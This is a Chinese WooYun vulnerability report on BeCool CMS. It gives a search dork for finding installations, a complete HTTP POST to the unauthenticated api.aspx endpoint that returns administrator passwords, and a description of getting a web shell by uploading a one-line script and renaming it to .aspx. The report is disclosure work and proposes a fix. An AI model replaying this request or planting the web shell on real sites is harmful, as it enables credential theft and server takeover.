当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104511

漏洞标题:becoolcms设计缺陷直查管理员密码(官网getshell)

相关厂商:贝一科技

漏洞作者: GrayTrack

提交时间:2015-04-02 11:06

修复时间:2015-05-17 11:08

公开时间:2015-05-17 11:08

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

becoolcms敏感信息泄露,秒杀官网

详细说明:

首先来几张图,看看用户量。
谷歌关键字:Powered by BeCool CMS

4.jpg


5.jpg


6.jpg

漏洞证明:

默认后台地址 www.xxx.com/becool/
官网为例,post数据

POST http://www.becoolcms.com/BeCool/api.aspx HTTP/1.1
Host: www.becoolcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: bdshare_firstime=1423234654320; Hm_lvt_c86e932f49ca6aab9ccf2d7603d18e21=1425188506,1426052010,1426055363,1427559239; Hm_lpvt_c86e932f49ca6aab9ccf2d7603d18e21=1427559239
Connection: keep-alive
Referer: http://www.becoolcms.com/becool/becoolApp.swf/[[DYNAMIC]]/9
Content-type: application/x-www-form-urlencoded
Content-length: 145
pageIndex=1&pageSize=10&conditions=%5B%5D&%5F%5F%5FfunctionName=BeCool%2EMember%2EUserControl%2EGetList&%5F%5F%5FaccessToken=null&orderbys=%5B%5D


接下来可以看到意想不到的效果,后台的api函数直接调用数据库,我也是醉了,把管理员密码给查出来了,真实奇葩的程序猿。

7.jpg


得到密码登录后台,后台随便上传一个txt文件,插一句话,右键重命名为aspx格式即可getshell。

8.jpg


修复方案:

禁用查询函数BeCool.Member.UserControl.GetList

版权声明:转载请注明来源 GrayTrack@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)